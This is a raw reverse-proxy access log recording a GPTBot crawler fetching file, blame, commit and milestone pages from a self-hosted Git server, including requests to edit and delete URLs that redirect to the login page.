"/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:27:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10180] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12298] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10178] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12297] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=mostcomplete&state=all" [Client 74.7.227.38] [Length 8502] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=mostcomplete&state=open" +[17/Feb/2026:16:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=mostissues&state=open" [Client 74.7.227.38] [Length 8496] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=mostissues&state=closed" +[17/Feb/2026:16:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx" +[17/Feb/2026:16:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx" +[17/Feb/2026:16:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:16:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:16:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx" +[17/Feb/2026:16:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx" +[17/Feb/2026:16:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:16:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 11195] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:16:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27874] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:16:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9758] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:16:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 10631] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:16:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 10064] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log" +[17/Feb/2026:16:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 10445] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:16:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 10054] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host" +[17/Feb/2026:16:27:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/update_status.py" [Client 74.7.227.38] [Length 12794] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/update_status.py" +[17/Feb/2026:16:27:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11529] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11564] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11559] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:27:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:16:27:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:16:27:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log" +[17/Feb/2026:16:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log" +[17/Feb/2026:16:27:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log" +[17/Feb/2026:16:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log" +[17/Feb/2026:16:27:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:16:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:16:27:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:16:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:16:27:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:16:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:16:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 9839] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log" +[17/Feb/2026:16:27:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/update_status.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/update_status.py" +[17/Feb/2026:16:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/update_status.py" +[17/Feb/2026:16:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16018] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12167] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11283] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11325] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11285] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11253] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16055] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11652] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16054] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:27:56 +0000] - 200 